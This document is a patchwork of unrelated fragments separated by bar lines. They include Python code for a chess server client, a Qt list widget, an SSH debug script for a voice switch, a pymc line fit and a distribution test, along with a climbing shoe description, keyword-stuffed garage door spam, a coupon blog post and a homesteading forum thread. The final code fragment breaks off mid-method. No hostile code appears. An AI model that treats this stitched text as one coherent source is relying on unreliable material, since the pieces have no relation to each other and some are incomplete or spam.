        # we have to do this here rather than in acceptReceived(), because
        # sometimes FICS pauses/unpauses a game clock without telling us that the
        # original offer was "accepted"/"received", such as when one player offers
        # "pause" and the other player responds not with "accept" but "pause"
        for offer in list(self.offers.keys()):
            if offer.type in (PAUSE_OFFER, RESUME_OFFER):
                del self.offers[offer]

    def onDisconnected(self, connection):
        # Losing the server connection kills any game still in progress.
        if self.status in (WAITING_TO_START, PAUSED, RUNNING):
            self.end(KILLED, DISCONNECTED)

    ############################################################################
    #                            Chat management                               #
    ############################################################################

    def onKibitzMessage(self, cm, name, gameno, text):
        # Kibitzes can arrive before the game widget exists; wait for it.
        if not self.gmwidg_ready.is_set():
            self.gmwidg_ready.wait()
        if gameno != self.ficsgame.gameno:
            return
        self.emit("message_received", name, text)

    def onWhisperMessage(self, cm, name, gameno, text):
        if gameno != self.ficsgame.gameno:
            return
        self.emit("message_received", name, text)

    def onObserversReceived(self, other, gameno, observers):
        if int(gameno) != self.ficsgame.gameno:
            return
        self.emit("observers_received", observers)

    ############################################################################
    #                             Offer management                             #
    ############################################################################

    def offerReceived(self, player, offer):
        """Forward an offer from one player to the opponent or the server."""
        log.debug("ICGameModel.offerReceived: offerer=%s %s" %
                  (repr(player), offer))
        if player == self.players[WHITE]:
            opPlayer = self.players[BLACK]
        else:
            opPlayer = self.players[WHITE]

        if offer.type == CHAT_ACTION:
            opPlayer.putMessage(offer.param)

        elif offer.type in (RESIGNATION, FLAG_CALL):
            # Unilateral actions go straight to the server.
            self.connection.om.offer(offer, self.ply)

        elif offer.type in OFFERS:
            if offer not in self.offers:
                log.debug("ICGameModel.offerReceived: %s.offer(%s)" %
                          (repr(opPlayer), offer))
                self.offers[offer] = player
                opPlayer.offer(offer)
            # If the offer was an update to an old one, like a new takebackvalue
            # we want to remove the old one from self.offers
            for offer_ in list(self.offers.keys()):
                if offer.type == offer_.type and offer != offer_:
                    del self.offers[offer_]

    def acceptReceived(self, player, offer):
        log.debug("ICGameModel.acceptReceived: accepter=%s %s" %
                  (repr(player), offer))
        if player.__type__ == LOCAL:
            if offer not in self.offers or self.offers[offer] == player:
                # Nothing outstanding to accept (or accepting one's own offer).
                player.offerError(offer, ACTION_ERROR_NONE_TO_ACCEPT)
            else:
                log.debug(
                    "ICGameModel.acceptReceived: connection.om.accept(%s)" %
                    offer)
                self.connection.om.accept(offer)
                del self.offers[offer]

        # We don't handle any ServerPlayer calls here, as the fics server will
        # know automatically if he/she accepts an offer, and will simply send
        # us the result.

    def checkStatus(self):
        # Game status is authoritative on the server side; nothing to do here.
        pass

    def onActionError(self, om, offer, error):
        self.emit("action_error", offer, error)

    #
    # End
    #

    def end(self, status, reason):
        """Finish the game locally and release server-side resources."""
        if self.examined:
            self.connection.bm.unexamine()

        if self.status in UNFINISHED_STATES:
            self.__disconnect()
            if self.isObservationGame():
                self.connection.bm.unobserve(self.ficsgame)
            else:
                # Try to abort first; if the server refuses, resign.
                self.connection.om.offer(Offer(ABORT_OFFER), -1)
                self.connection.om.offer(Offer(RESIGNATION), -1)

        if status == KILLED:
            GameModel.kill(self, reason)
        else:
            GameModel.end(self, status, reason)

    def terminate(self):
        # Unlike __disconnect(), this detaches *all* handlers, Humans included.
        for obj in self.connections:
            for handler_id in self.connections[obj]:
                if obj.handler_is_connected(handler_id):
                    obj.disconnect(handler_id)
        self.connections = None
        GameModel.terminate(self)

    def goFirst(self):
        self.connection.client.run_command("backward 999")

    def goPrev(self, step=1):
        self.connection.client.run_command("backward %s" % step)

    def goNext(self, step=1):
        self.connection.client.run_command("forward %s" % step)

    def goLast(self):
        self.connection.client.run_command("forward 999")

    def backToMainLine(self):
        self.connection.client.run_command("revert")
|
Technical climbing shoe with innovative closure, consisting of two Velcro straps with differentiated and opposite pull direction. Ideal for multi-purpose use in the mountains, crags and bouldering. The successful combination of synthetic and natural materials provides the best compromise between comfort, technical performance and inalterability in the long run. A special midsole with prehensile area under the toe provides for optimal edging support, increasing sensitivity. A Vibram sole with Xs Grip2 for maximum grip. These features make the Katana Woman shoe ideal for climbers who love climbing in all its forms, from bouldering to the crag and classical climbing routes on the wall.
Suede leather combined with microfiber, slip lasted.
Dentex in the back, Pacific in the front.
+ Multifunctional shape and fit; perfect for all types of climbing.
+ Upper in microfiber in the front to maintain its characteristics over time.
+ The anterior part of the sole has no lining to allow for enhanced sensitivity and grip.
|
from PySide2.QtWidgets import QListWidget
from PySide2.QtCore import Signal, Slot, Qt
from PySide2 import QtCore
class CustomListWidget(QListWidget):
    """List widget that tracks a multiset of selected item names.

    Plain left-click selects an item (incrementing its count and clearing
    everything else); Shift/Ctrl + left-click adds one more copy of the item;
    right-click removes one copy.  The current count of each item is shown by
    appending ":count" to its display text.
    """

    # Emitted whenever the custom selection (self.itemList) changes.
    customItemSelection = Signal()

    def __init__(self, parent=None):
        super(CustomListWidget, self).__init__(parent)
        # Multiset of selected item names; duplicates encode the count.
        self.itemList = []
        self.setMinimumSize(QtCore.QSize(160, 0))
        self.setMaximumSize(QtCore.QSize(245, 16777215))

    def mousePressEvent(self, event):
        """Translate mouse clicks into selection-count updates and refresh labels."""
        super(CustomListWidget, self).mousePressEvent(event)
        item = self.itemAt(event.pos())
        if item:
            # Display text is "name:count"; keep only the bare name.
            text = item.text().split(":")[0]
            # check button clicked
            if event.button() == Qt.LeftButton:
                if (event.modifiers() == Qt.ShiftModifier) or (event.modifiers() == Qt.ControlModifier):
                    # Modifier click: add one more copy without touching other items.
                    self.itemList.append(text)
                else:
                    # Plain click: remember this item's count, clear everything,
                    # then re-add this item with its previous count plus one.
                    count = self.itemList.count(text)
                    self.clearItems()
                    for c in range(count + 1):
                        self.itemList.append(text)
            elif event.button() == Qt.RightButton:
                # Right click removes a single copy, if present.
                if text in self.itemList:
                    self.itemList.remove(text)
            # update list text
            count = self.itemList.count(text)
            # NOTE(review): setSelected() expects a bool; passing the int count
            # relies on implicit truthiness -- confirm intended.
            self.itemAt(event.pos()).setSelected(count)
            if count:
                self.itemAt(event.pos()).setText(text + ":" + str(count))
            else:
                # self.itemAt(event.pos()).setPlainText(text)
                self.itemAt(event.pos()).setText(text)
            self.customItemSelection.emit()
        else:
            # Click on empty space clears the whole selection.
            self.clearItems()

    def clearItems(self):
        """Reset the selection and strip the ":count" suffix from every row."""
        self.itemList = []
        for pos in range(self.count()):
            self.item(pos).setText(self.item(pos).text().split(":")[0])

    # return our custom selected item list
    def customItemList(self):
        """Return the list of selected names (duplicates encode counts)."""
        return self.itemList
|
Here at Garage Door Installation Pro, we are here to satisfy your standards when it comes to Garage Door Installation in Fairmont, OK. Our crew of highly skilled experts can provide the expertise that you need with the most sophisticated technologies in the industry. We will apply high standard supplies and cash conserving practices to ensure that you will get the best solutions for the best price. Contact us today by dialing 844-244-6199 to get going.
Here at Garage Door Installation Pro, we understand that you need to keep in budget and lower your expenses wherever it is possible to. Still, saving money should not indicate that you give up superior quality on Garage Door Installation in Fairmont, OK. We provide the best quality while still helping you save money. Our intention is to make sure that you acquire the best quality materials and an end result which endures throughout the years. As an example, we are thorough to avoid pricey errors, work efficiently to save hours, and make sure that you get the most effective bargains on supplies and labor. Call up Garage Door Installation Pro when you need the best services at the lowest price. Call 844-244-6199 to talk with our customer service agents, today.
You will need to be informed concerning Garage Door Installation in Fairmont, OK. You shouldn't enter into it without knowing it properly, and you need to understand what to anticipate. We will take the unexpected surprises from the equation by providing precise and thorough information. Start by dialing 844-244-6199 to go over your venture. We're going to talk about your concerns whenever you call and help you get arranged with a meeting. Our crew can arrive at the appointed time with the appropriate resources, and can work together with you all through the undertaking.
There are a lot of good reasons to pick Garage Door Installation Pro for Garage Door Installation in Fairmont, OK. We are the best option whenever you need the best cash saving options, the highest quality products, and the highest rank of customer service. We fully understand your expectations and intentions, and we're available to assist you with our expertise. Whenever you need Garage Door Installation in Fairmont, choose Garage Door Installation Pro by dialing 844-244-6199, and we are going to be more than pleased to help.
|
''' This module will enable/disable debug for ST Voice switches and
Voice switches, Phones and any generic machine using MS Windows.
_________________________________________________________________________________
|-- startdebug(self,device="switch",argv)
| argv options: sip,trunk,ssua,sb,ext
| device:"switch", "phone" ;
| key:cert key to be used
|
|-- savedebug(self)
|-- cleardebug(self)
class--debug(cls)--|
|-- setdebugenv(self,device="switch")
| "switch" option will enable following:
| - cli
| - trace_redirect 0
| - trace_redirect 1
| "Phone" option will enable following
| - TBA
|-- startTshark(self)
|-- stopTshark(self)
|-- uploadTshark(self,destination)
"will be uploaded to temp directory of script"
_____________________________________________________________________________________
++Changelist++
Version 1.0: Initial program created
_________________________________________________________________________________
TODO
- Add all functions()
Questions & Feedback: Please contact etoolsclub.com
_________________________________________________________________________________
'''
import etools
import re
import string
import paramiko
import traceback
import sys
import os
from time import sleep
from etools import SSH
from utilities import Directory
# NOTE(review): this module-level client appears unused -- SendCommand reads
# self.login, presumably provided by the SSH base class; confirm before removing.
login = paramiko.SSHClient()
class SendCommand(SSH):
    """SSH helpers for enabling, collecting and parsing debug traces on a voice switch.

    Relies on the ``SSH`` base class to provide ``self.login`` (a connected
    ``paramiko.SSHClient``) via ``connect()``.
    """

    def startDebug(self):
        """Open an interactive shell and turn on SIP debug tracing on the switch."""
        try:
            ssh = self.login.invoke_shell()
            ssh.send('cli \n')
            sleep(3)  # give the switch CLI time to come up between commands
            ssh.send('trace_redirect 0 \n')
            sleep(3)
            ssh.send('trace_redirect 1 \n')
            sleep(3)
            ssh.send('dbg "on sip" \n')
        except Exception:
            traceback.print_exc()

    def stopDebug(self):
        """Stop debug tracing, save the captured output and close the channel.

        Bug fix: this method previously lacked the ``self`` parameter, so any
        instance call (``b.stopDebug()``) raised ``TypeError``.
        """
        try:
            ssh = self.login.invoke_shell()
            ssh.send('dbg "clear" \n')
            output = ssh.recv(65535)
            # NOTE(review): the directory created here is unused; the log goes to a
            # hard-coded relative path -- confirm the intended output location.
            path = Directory.create()
            with open(r'temp\binarydata.log', 'wb') as f:
                f.write(output)
            # Bug fix: paramiko channels are closed with close(); disconnect()
            # does not exist and raised AttributeError.
            ssh.close()
            print("Closing the SSH Session")
        except Exception:
            traceback.print_exc()

    def sendTone(self, tonetype):
        """Placeholder: send a test tone of the given type (not implemented)."""
        try:
            pass
        except Exception:
            traceback.print_exc()

    def resetTone(self):
        """Placeholder: reset tone generation (not implemented)."""
        try:
            pass
        except Exception:
            traceback.print_exc()

    def startCapture(self, filters):
        '''Placeholder: start a packet capture (use Tshark utility).'''
        try:
            pass
        except Exception:
            traceback.print_exc()

    def stopCapture(self, filters):
        """Placeholder: stop the packet capture (not implemented)."""
        try:
            pass
        except Exception:
            traceback.print_exc()

    def getCallID(self, samplefile="c:\\Python3\\sample.log"):
        """Print the Call-ID of every INVITE transaction found in *samplefile*.

        Bug fix: ``samplefile`` was previously overwritten with a hard-coded
        path, so the argument was ignored.  It is now an overridable default,
        which keeps existing no-argument callers working while honouring the
        parameter.  (Unused locals shadowing the ``string`` module removed.)
        """
        try:
            with open(samplefile, "rb") as infile:
                # Each INVITE transaction body: everything between "INVITE sip:"
                # and the "Content-Length:" header.
                for result in re.findall(b"INVITE sip:(.*?)Content-Length:", infile.read(), re.S):
                    # Find the Call-ID header(s) within that INVITE transaction.
                    callid = re.findall(b"Call-ID:(.*?)\n", result, re.DOTALL)
                    for i in callid:  # findall returns a list; print each match
                        print(i.decode("utf-8"))  # binary string -> regular string
            # NOTE(review): only the last INVITE body is saved, mirroring the
            # original behaviour -- confirm whether all transactions are wanted.
            with open('Callid.log', 'wb') as f:
                f.write(result)
        except Exception:
            traceback.print_exc()
if __name__ == "__main__":
    # Smoke run: connect, start debug tracing, then stop and save the output.
    b = SendCommand()
    b.connect()
    b.startDebug()
    # Bug fix: the original ``b.stopDebug`` referenced the method without
    # calling it, so tracing was never stopped or saved.
    b.stopDebug()
|
CWS-boco moves people and people move us. The 3,800 men and women currently working with and for us bring their diverse experience, cultural backgrounds and individual perspectives with them every day in their daily work. We perceive this diversity as a great opportunity for our company. In order to be successful, it is essential not just to accept cultural differences, but rather to appreciate them, see them as an enrichment and promote them.
|
import pymc
def pymc_linear_fit_withoutliers(data1, data2, data1err=None, data2err=None,
                                 print_results=False, intercept=True, nsample=50000, burn=5000,
                                 thin=5, return_MC=False, guess=None, verbose=0):
    """
    Use pymc to fit a line to data with outliers, assuming outliers
    come from a broad, uniform distribution that cover all the data.

    :param data1: xdata
    :param data2: ydata
    :param data1err: x errors
    :param data2err: y errors
    :param print_results: whether or not to print out the results
    :param intercept: whether or not to fit for intercept
    :param nsample: number of samples
    :param burn: number of burn-in samples
    :param thin: thinning value
    :param return_MC: whether or not to return the pymc MCMC instance
    :param guess: initial guesses for slope and intercept
    :param verbose: verbosity level of MCMC sampler

    :return: the MCMC instance if return_MC is True; otherwise the posterior
             mean slope (and mean intercept, when fitted).
    """
    if guess is None:
        guess = (0, 0)

    # Latent "true" x; the observed x values are modelled as noisy around it.
    xmu = pymc.distributions.Uninformative(name='x_observed', value=0)
    if data1err is None:
        # No x errors supplied: unit precision.
        xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=1, trace=False)
    else:
        # Convert 1-sigma errors to precision (tau = 1/sigma^2).
        xtau = pymc.distributions.Uninformative(name='x_tau', value=1.0 / data1err ** 2, observed=True, trace=False)
        xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=xtau, trace=False)

    # Model pieces: the slope, a per-point outlier flag, and the broad uniform
    # distribution ("bady") the outliers are assumed to be drawn from.
    d = {'slope': pymc.distributions.Uninformative(name='slope', value=guess[0]),
         'badvals': pymc.distributions.DiscreteUniform('bad', 0, 1, value=[False] * len(data2)),
         'bady': pymc.distributions.Uniform('bady', min(data2 - data2err), max(data2 + data2err), value=data2)}
    if intercept:
        d['intercept'] = pymc.distributions.Uninformative(name='intercept', value=guess[1])

        # (True - badvals) is 1 for inliers and 0 for outliers, so each point is
        # described either by the line or by the broad outlier distribution.
        @pymc.deterministic(trace=False)
        def model(x=xdata, slope=d['slope'], intercept=d['intercept'], badvals=d['badvals'], bady=d['bady']):
            return (x * slope + intercept) * (True - badvals) + badvals * bady
    else:
        @pymc.deterministic(trace=False)
        def model(x=xdata, slope=d['slope'], badvals=d['badvals'], bady=d['bady']):
            return x * slope * (True - badvals) + badvals * bady
    d['f'] = model

    if data2err is None:
        ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=1, trace=False)
    else:
        ytau = pymc.distributions.Uninformative(name='y_tau', value=1.0 / data2err ** 2, observed=True, trace=False)
        ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=ytau, trace=False)
    d['y'] = ydata

    MC = pymc.MCMC(d)
    MC.sample(nsample, burn=burn, thin=thin, verbose=verbose)

    # Posterior summaries for the fitted parameters.
    MCs = MC.stats()
    m, em = MCs['slope']['mean'], MCs['slope']['standard deviation']
    if intercept:
        b, eb = MCs['intercept']['mean'], MCs['intercept']['standard deviation']
    if print_results:
        print "MCMC Best fit y = %g x" % (m),
        if intercept:
            print " + %g" % (b)
        else:
            print ""
        print "m = %g +/- %g" % (m, em)
        if intercept:
            print "b = %g +/- %g" % (b, eb)
        # NOTE(review): this chi^2 ignores the fitted intercept and the y
        # errors -- confirm whether that is intended.
        print "Chi^2 = %g, N = %i" % (((data2 - (data1 * m)) ** 2).sum(), data1.shape[0] - 1)
    if return_MC:
        return MC
    if intercept:
        return m, b
    else:
        return m
if __name__ == "__main__":
    # Demo: fit the classic Hogg et al. outlier data set and plot the result.
    import numpy as np
    import matplotlib.pyplot as plt
    from pymc.Matplot import plot

    #fake data [x, y, yerr, xyerr]
    data = np.array([[201, 592, 61, 9],
                     [244, 401, 25, 4],
                     [47, 583, 58, 11],
                     [287, 402, 15, 7],
                     [203, 495, 21, 5],
                     [58, 173, 15, 9],
                     [210, 479, 27, 4],
                     [202, 504, 14, 4],
                     [198, 510, 30, 11],
                     [158, 416, 16, 7],
                     [165, 393, 14, 5],
                     [201, 442, 25, 5],
                     [157, 317, 52, 5],
                     [131, 311, 16, 6],
                     [166, 400, 34, 6],
                     [160, 337, 31, 5],
                     [186, 423, 42, 9],
                     [125, 334, 26, 8],
                     [218, 533, 16, 6],
                     [146, 344, 22, 5],
                     [150, 300, 23, 10],
                     [270, 620, 40, 15]])
    #rename columns
    # Column layout used below: column 2 holds the y errors, column 3 the x errors.
    xdata, ydata = data[:, 0], data[:, 1]
    xerr, yerr = data[:, 3], data[:, 2]

    #perform MCMC
    MC = pymc_linear_fit_withoutliers(xdata, ydata, data1err=xerr, data2err=yerr, return_MC=True)
    # Draw additional samples on top of those taken inside the fit function.
    MC.sample(100000, burn=1000, verbose=0)

    #show the results
    fig = plt.figure()

    #plot the confidence levels
    # Lines evaluated at the 2.5% / 97.5% posterior quantiles of slope/intercept.
    low25 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][2.5] + MC.stats()['intercept']['quantiles'][2.5]
    top97 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][97.5] + MC.stats()['intercept']['quantiles'][97.5]
    plt.fill_between(np.linspace(20,300), low25, top97, color='k', alpha=0.1, label='2.5/97.5 quartile')

    #plot the average results
    plt.plot(np.linspace(20,300), np.linspace(20,300)*MC.stats()['slope']['mean'] + MC.stats()['intercept']['mean'],
             color='k', linewidth=1, label='Average fit')

    #plot data
    plt.errorbar(xdata, ydata, xerr=xerr, yerr=yerr, color='b', label='data', fmt='o')

    #show likely outliers
    # Points whose posterior outlier flag ended up truthy.
    plt.plot(xdata[MC.badvals.value.astype('bool')], ydata[MC.badvals.value.astype('bool')], 'rs',
             label='likely outliers')
    plt.xlim(20, 300)
    plt.legend(shadow=True, fancybox=True, scatterpoints=1, numpoints=1, loc='upper left')
    plt.savefig('test.pdf')
    plt.close()

    #MCMC plot
    # pymc's diagnostic plots (trace, autocorrelation, histogram) per variable.
    plot(MC)
|
There are two things that I find it very difficult to spend money on: washcloths and socks. Some of our washcloths are 10 years old, so I was very thankful this week when my mom gave me some much needed washcloths and towels that were given to her.
Our older son earned a coupon for a free personal pan pizza from the Pizza Hut Book-It Program.
A dentist visited our younger son's class and he was given a goody bag with a toothbrush, toothpaste and floss.
I saved the stickers from the Highlights offer we received in the mail to put in an Operation Christmas Child shoe box.
I was very excited to find canned pumpkin for $.99 each! I also bought molasses for $1.99 (usually over $3) and apples and onions for $.33/lb.
I bought our younger son a shirt and shorts that he will (hopefully) be able to wear next summer for $3.50.
I bought apples on sale last week that we had never tried before and it turned out we didn't really care for them. I discovered though that they make the best applesauce I have ever had! Next time I see a sale, I will definitely buy more for applesauce.
In my mailbox: Gain and Pantene samples and coupons from P&G and two free magazines.
|
#!/usr/bin/env python
import os
import sys
sys.path.append(os.path.realpath(os.path.join(os.path.realpath(__file__),"../../../../util")))
import histogram
import subprocess
# One entry per distribution type under test: the config parameters to write,
# the x-range to histogram/plot, and a gnuplot definition of the analytic pdf
# f(x, ...) used as the reference curve against the sampled histogram.
# ("fixed" uses a narrow Gaussian to approximate a delta spike at the value.)
settings = [
    {
        "type": "fixed",
        "params": [ ("value", 0.5) ],
        "plotrange": (-1, 1),
        "f": "samples=100000;s=0.01;f(x,p) = 1.0/(sqrt(2.0*pi)*s)*exp(-(x-p)**2/(2*s**2))"
    },
    {
        "type": "uniform",
        "params": [ ("min", -1), ("max", 4) ],
        "plotrange": (-2, 5),
        "f": "H(x) = (x/abs(x)+1.0)/2.0 ; f(x,a,b) = 1.0/(b-a)*H(x-a)*H(b-x)"
    },
    {
        "type": "beta",
        "params": [ ("a", 2), ("b", 5), ("min", -2), ("max", 3) ],
        "plotrange": (-3,4),
        "f": "H(x) = (x/abs(x)+1.0)/2.0; f(x,a,b,k,l) = gamma(a+b)/(gamma(a)*gamma(b))*((x-k)/(l-k))**(a-1.0)*(1.0-((x-k)/(l-k)))**(b-1.0)*H(x-k)*H(l-x)/(l-k)"
    },
    {
        "type": "gamma",
        "params": [ ("a", 5), ("b", 1.5) ],
        "plotrange": (0, 15),
        "f": "f(x,a,b) = x**(a-1.0)*exp(-x/b)/(b**a*gamma(a))"
    },
    {
        "type": "lognormal",
        "params": [ ("zeta", 0.5), ("sigma", 0.25) ],
        "plotrange": (0, 3),
        "f": "f(x,z,s) = 1.0/(x*s*sqrt(2.0*pi))*exp(-(log(x)-z)**2/(2.0*s**2))"
    }
]
# For each distribution: write a config file, run the sampler executable,
# histogram its output, and plot the histogram against the analytic pdf.
# Fixes: removed the redundant f.close() calls inside 'with' blocks (the
# context manager already closes the file), and replaced the Python-2-only
# "print >>f" statements with equivalent f.write() calls.
for s in settings:
    # Write config file for these settings
    lines = []
    lines.append("test.dist.type = " + s["type"])
    for p in s["params"]:
        lines.append("test.dist." + s["type"] + "." + p[0] + " = " + str(p[1]))
    data = "\n".join(lines)
    fileName = "config-tmp-" + s["type"]
    with open(fileName, "wt") as f:
        f.write(data)

    # Run the executable with this config file, capturing stdout (the samples)
    outName = "out-tmp-" + s["type"]
    with open(outName, "wt") as f:
        subprocess.call(["../../../build_ninja2/testconfig-opt-debug", fileName], stdout=f)

    # Process generated values in histogram (one sample per line)
    h = histogram.Histogram(s["plotrange"][0], s["plotrange"][1], 100)
    with open(outName, "rt") as f:
        l = f.readline()
        while l:
            val = float(l)
            h.process(val)
            l = f.readline()
    histName = "hist-tmp-" + s["type"]
    with open(histName, "wt") as f:
        h.printProb(f)

    # Write gnuplot file overlaying the histogram and the analytic pdf
    plotName = "plot-tmp-" + s["type"] + ".gnuplot"
    pngName = "plot-tmp-" + s["type"] + ".png"
    with open(plotName, "wt") as f:
        f.write("set terminal png\n")
        f.write("set style data lines\n")
        f.write("set output '%s'\n" % pngName)
        f.write(s["f"] + "\n")
        # Build "f(x,p1,p2,...)" with the concrete parameter values.
        function = "f(x"
        for p in s["params"]:
            function += "," + str(float(p[1]))
        function += ") "
        f.write("plot [%g:%g] '%s', %s lt 3\n" % (s["plotrange"][0], s["plotrange"][1], histName, function))
    subprocess.call(["gnuplot", plotName])

    # Remove the temporary files; only the PNG is kept.
    os.unlink(plotName)
    os.unlink(histName)
    os.unlink(outName)
    os.unlink(fileName)
|
I'll see if I can find the article Brian.
Edit - This is what I think I was looking at. Certainly this could be an issue for people with Diabetes but I'm not sure who else it would effect.
Nell and I went out yesterday. The Jeep has a block heater whereas the Jetta does not. I've looked into block heaters for the VW diesel, but at this point they are a little too pricey for our budget at this moment. That's okay the Jeep has nice snow tires and a block heater. Nell and I had the most wonderful afternoon in town.
The Jeep has the block heater built into the engine block.
The vw-block-heater has a little different block heater setup.
On the bright side this looks much easier to install than the freeze plug installation the Jeep has.
We did order a new starter for the VW Jetta as one of the issues in the cold mornings is the starter turns for a few seconds then spins free.
That is a classic problem with old cars and starters and often happens because oil gets down in the starter and on the shaft where the pinion gear fails to stay engaged with the engine flywheel because oil and grease get sticky in cold weather. Sometimes I am able to clean the starter and it works again. However as I get older I need to limit the time I'm working under cars, so I won't take the chance it is repairable.
Weather-Sapello-NM-87745-12-29-18 Yeah baby it's brisk outside!
I've let all the exercise routines I used while I thought I only had scoliosis go, in favor of getting outside and performing much needed chores. Now it looks like those chores are aggravating my spine. That's okay I can change, I want to be healthy, especially after coming off this yeast fungal overgrowth disease which I believe in part is called SIBO.
One of the issues I am coping with now is how all the medical professionals missed the severity of the spinal stenosis. Personally, I missed it myself because I thought the pain was coming from whatever caused all the other pain that had me down for the count. Thank the universe for Doctor Lilly Bletcher who with her brilliant analysis of the blood and genetic tests, has confirmed the cause of one disease which ruled out the cause of the structural back issue. Now I can move forward with knowledge and treatment of both. I'm still upset the western medicine providers didn't pay enough attention to the results of the MRI.
Again, tremendous thanks go out to Dr. Lilly for requesting a copy of this MRI and posting it back to me.
I have an appointment with my primary care doctor on my birthday, the 11th of January. At that time I will emphasize the critical nature of this report and request physical therapy specifically related to this new information. On January 1st, 2019, I'll switch over from the blessed Medicaid to Medicare. I'm a bit apprehensive about this change, hopefully it'll be a smooth transition and Medicaid will be my secondary insurance.
I have spent a good deal of time in research and physical work to begin the transition of as much of this property as possible to sustainable ecosystems through permaculture. With the effects of time and climate, I believe this is the best chance to keep alive and preserve this beautiful land we are so lucky to live on. The process is long reaching but the results are in perpetuity. I like that word.
It is going to take much more physical work than I can safely do. I am looking into large and small equipment that will be able to replace the stress on the back because there is no perpetuity in that skeletal structure. Nell and I are looking into ways to find assistance in this like grants or programs such as go fund me. If anyone has experience with these, please share your knowledge and opinions with us.
Feeling hopeful for the new year and hoping you are as well. Hell, if we are really lucky the Feds will be the first ever to arrest a sitting president!!!
Hehe we don't need no Hotmail.
Hi how is everyone? We're doing fine.
We've had Nell's niece Kylee, her husband Rod and OMG their crazy happy baby Kyros staying with us during this glorious wintry weather. As usual I did not shoot any pictures, yet. I'll try today. Everyone is asleep still. I've used the quiet morning to make cookies and granola. Cookies are out, granola is still in the oven. As with Nell's family tradition we're doing a jigsaw puzzle on the dining table. That's a super way to spend time together and talk.
Yesterday we went to the Dwan Light Sanctuary and Montezuma Hot Springs. The staff at UWC hadn't shoveled the path to the light sanctuary, so it wasn't open yet. That was too bad, but the hot springs were really nice, even with all the snow around. I know my back feels much better after soaking in the healing waters.
I tried to not get all crazy shoveling the paths to the out-buildings, but some places needed a path, including the path to our lone Guinea hen. Nell's did a wonderful job sealing her house and putting up insulating curtains over the windows. We have a heat lamp in the fowl house which is enough to keep her water dish from freezing, except on one morning when the temperatures dropped to zero. Then I had to make a trail free of snow so the bird could get to the SE corner cubby she likes to sit where she can look in the window and watch us from.
Anywho, then we were blessed with yet another snow fall. This one greater than the last.
Sounds like every one is waking up.
This is such a great way to start the new year.
I hope you all are doing great too.
Yes, that's the way it is supposed to look.
Same here on the hill, good snow cover. We had around 3 feet coming down and have around 2 feet on the ground. I could have done without the brutal cold of the week, the temp drop to -27C Thursday night.
More snow to come this week end, but it will be rather warm, 40F today .
I have to get my lawn chair out and sit under the palm tree and sip a drink and watch the girls in skimpy dresses.
I use for Mrs D and Mr D a heat dog water bucket, 100 W, the water never froze.
You're on the foothills of the Sangre de Christo range? You're having a great year of snow! Hope for more progress on your health in the coming year.
Thanks gnoib and bridgie. Yes this is a fantastic Winter and it just began! Indeed we are where the Great Plains meet the Rockies!
You've been quiet Boss, all ok?
Hey hi Sheg. Thanks for asking. Yes we're both doing well. I had a structural problem in my hips and Lumbar spine, but an amazingly talented D-PT got me straightened out in a about four weeks.
This is where we're spending most of our energy. We're in between tenants and doing much needed cleaning, drywall repairs, and lightly remodeling this modular house. I'm here to tell you, they didn't build these things with maintenance in mind.
Winter here was snowy snowy. We love the snow, but not the mud that occurs afterward. In fact it rained about dusk last night, the turned to snow after that. About two inches of the snow stuck, now it's gone and the mud is back. Oh well.
Fish are doing well too. There are still eight Brook trout and the five big Comets. The system is working better with a dozen full size fish.
You may be able to see that the Kale in the DWC is greener than during the Summer. I really pushed the envelope by adding 100 five inch Brookie fingerlings 16 months ago. The system did it too, of course with a lot of filter cleaning. We still have trout in the freezer, grin. We had enough trout to eat and plenty to give away too. I was thinking I could go with fifty fingerlings this time and make my life easier, but hey, when is life easy?
Hopefully this season I'll be healthier and be able to give the AP the attention it requires. Peppers are beginning their second season as is the new beef heart tomato. The rest of the tomatoes are third season in the same media beds.
I was able to open the Koi pond four or five times between stow-storms to un-clog the outflow from the pond. Also with this setup I opened the filter area and clean those filters from above. Next Winter I'll make some improvements to the glass mounting so it is even easier to open and close. I've got to baby my spine so I need to put handles and perhaps some kind of counter-balances on them so they are lighter. Even when my back was strong moving those old plate glass sliding doors was always difficult.
I think you all will be hearing from me more often now that it seems I'm good to go again. Yay.
Good to hear that you are basically doing well.
Your snow is mostly gone already ! Looks springy.
I still have in most places 3 feet on the ground, some 4 and now the next snow storm has started.
Good to hear from you gnoib. Yep the snow that fell this morning as we were leaving for Santa Fe is already gone, probably got rained on.
Good to hear Boss. Like Skeggley, I was getting a bit concerned, but was too frightened to ask.
You're not usually out of the loop for so long.
I've copied your Hugel Kultur in my earth garden this autumn and have been madly trying to finish off my greenhouse and AP system in there before winter. It's still been so hot here that working in there anytime but mornings has just meant sauna conditions and rapid dehydration (and there were SO many tree roots to cut through). We haven't seen any rain for about 5 months now, so garden wise most things are looking dead. Our daughter and hubby have come down from Sydney for the weekend and I was hoping they could bring some rain down with them...she says anything under 30mm up there doesn't count as rain LOL.
Last edited by bridgie on Mar 23rd, '19, 05:54, edited 1 time in total.
Sounds like good news, boss. Passed your way last Sat on way to Angel Fire and wondered how your systems have fared through the winter.
Thanks for checking on me Nhibbo. Yes indeed, I made it though hopefully the last bout of spinal issues in much better condition. My hip were seriously out of wack, even better than what the first doctor of physical therapy did. My spine is still weak with spinal stenosis. I got an inversion table for my 65th birthday. Yay!
That's cool about the hugelkulture mound. The spinal degradation I thought was going to put me out of the permaculture hobby before I got started. I'm thinking a lot lately about mini-excavators.
I kept having dreams of me as the mechanic Steve J. Spears in Mad Max 2. I realized I was really scared my spine was a goner.
I need something that can do hugelkulture and swales.
I really like the micro-excavators because the operator is right there overlooking the job.
These have stability issues and the terrain here may be too uneven.
|
import requests
import os
from settings import (SERVER_NAME,
MEDIAVIEWER_TV_PATH_URL,
MEDIAVIEWER_MOVIE_PATH_URL,
WAITER_USERNAME,
WAITER_PASSWORD,
LOCAL_TV_SHOWS_PATHS,
LOCAL_MOVIE_PATHS,
VERIFY_REQUESTS,
)
from utils import postData
from log import LogFile
log = LogFile().getLogger()
class Path(object):
    """A local filesystem path paired with its remote counterpart.

    Instances can POST themselves to the mediaviewer API; the classmethods
    query the API for known TV/movie paths and enumerate paths on local disk.
    """

    def __init__(self, localpath, remotepath):
        self.localpath = localpath
        self.remotepath = remotepath

    def _post(self, useMovieURL=False):
